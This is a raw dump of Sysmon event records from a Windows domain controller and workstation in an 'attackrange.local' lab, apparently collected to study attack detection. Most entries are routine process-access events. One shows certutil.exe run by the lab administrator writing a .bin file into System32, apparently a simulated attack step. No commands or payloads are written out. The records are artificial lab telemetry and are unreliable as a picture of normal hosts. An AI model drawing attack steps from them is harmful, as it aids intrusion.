21:49:53.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917651Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:53.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917650Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:53.235{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A06DB9348BC8426242EA0C16188724C,SHA256=C294645F9D9EB6AF2427D2105F1E8018AB0814823A132550C383606473E7C705,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638487Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B402-605B-295A-00000000AF01}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638486Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638485Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638484Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638483Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638482Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638481Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638480Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638479Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638478Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638477Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B864-6058-0500-00000000AF01}628644C:\Windows\system32\csrss.exe{BFB545BB-B402-605B-295A-00000000AF01}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638476Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.741{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B402-605B-295A-00000000AF01}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638475Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.742{BFB545BB-B402-605B-295A-00000000AF01}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638474Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:54.601{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B08EFCC9611FDD9C2ED6DEAFB30969,SHA256=15B2CDC716213248BA2520A51616167F957B1DB9D3AA6CD1FD2808AF13CCCB3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917655Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:54.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917654Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:54.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917653Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:54.263{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0105D556FA580CAC9644F25C6C5C82,SHA256=834AFD6DD58361CE186AFD8477EA77F1F2A6ADBE4D308A7CC0AF38C481C968BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638505Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.726{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5194EE3746D55680A0BB461FA4B12591,SHA256=B8A583D93B66B0B1D279AC145EF58491D31EC1C3181411C8E2CEACBDCC23D7C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638504Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:51.521{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57254-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x80000000000000005917694Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917693Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917692Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.414{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC2D1FB0CABBB92BCFDA2FFB4E064D3C,SHA256=AF721F954D12D96046137F89CCCA77D3075E61815E8D7C7CBD130B44AC475E05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917691Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.334{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917690Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.334{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917689Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917688Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917687Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917686Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.325{896A638B-B403-605B-8169-00000000AE01}6800ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.binMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917685Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.276{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917684Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 